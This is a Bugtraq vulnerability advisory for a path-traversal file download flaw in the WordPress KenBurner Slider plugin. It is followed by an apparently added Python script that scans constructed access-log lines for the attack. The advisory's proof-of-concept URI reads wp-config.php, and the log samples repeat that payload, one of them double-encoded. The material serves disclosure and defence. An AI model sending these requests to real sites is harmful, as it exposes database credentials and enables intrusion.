WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerability
BID:69387
Info
| Bugtraq ID: | 69387 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 24 2014 12:00AM |
| Updated: | Aug 24 2014 12:00AM |
| Credit: | MF0x and Daniel Pen |
| Vulnerable: | ENVATO KenBurner Slider 0 |
| Not Vulnerable: | |
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
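For defenders, the request shape above is easy to hunt for in web server access logs. The following detection script is an added example, not part of the Bugtraq entry: it parses constructed Apache-style log lines (sample data, not real traffic), picks out requests to admin-ajax.php with action=kbslider_show_image, URL-decodes the img parameter (including double-encoded variants) and reports any value that climbs out of its directory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the advisory): one benign
# slide request, the traversal from the advisory, and a double-encoded variant.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Aug/2014:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=slide1.jpg HTTP/1.1" 200 51200
203.0.113.9 - - [24/Aug/2014:10:02:17 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120
203.0.113.9 - - [24/Aug/2014:10:02:40 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%252F..%252Fwp-config.php HTTP/1.1" 200 3120
"""

# Minimal combined-log-format matcher: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(value: str) -> bool:
    """True if the fully decoded value is absolute or contains a '..' path segment."""
    decoded = value
    for _ in range(3):  # peel off repeated URL encoding (%252F -> %2F -> /)
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    decoded = decoded.replace("\\", "/")
    return decoded.startswith("/") or ".." in decoded.split("/")


def find_kbslider_traversal(log_text: str) -> list[dict]:
    """Return one record per request that abuses the kbslider_show_image img parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("action", [""])[0] != "kbslider_show_image":
            continue
        img = qs.get("img", [""])[0]  # parse_qs already decoded one layer
        if is_traversal(img):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "img": img, "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in find_kbslider_traversal(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the signal that matters: it means the file was actually served, so the site's database credentials in wp-config.php should be treated as exposed.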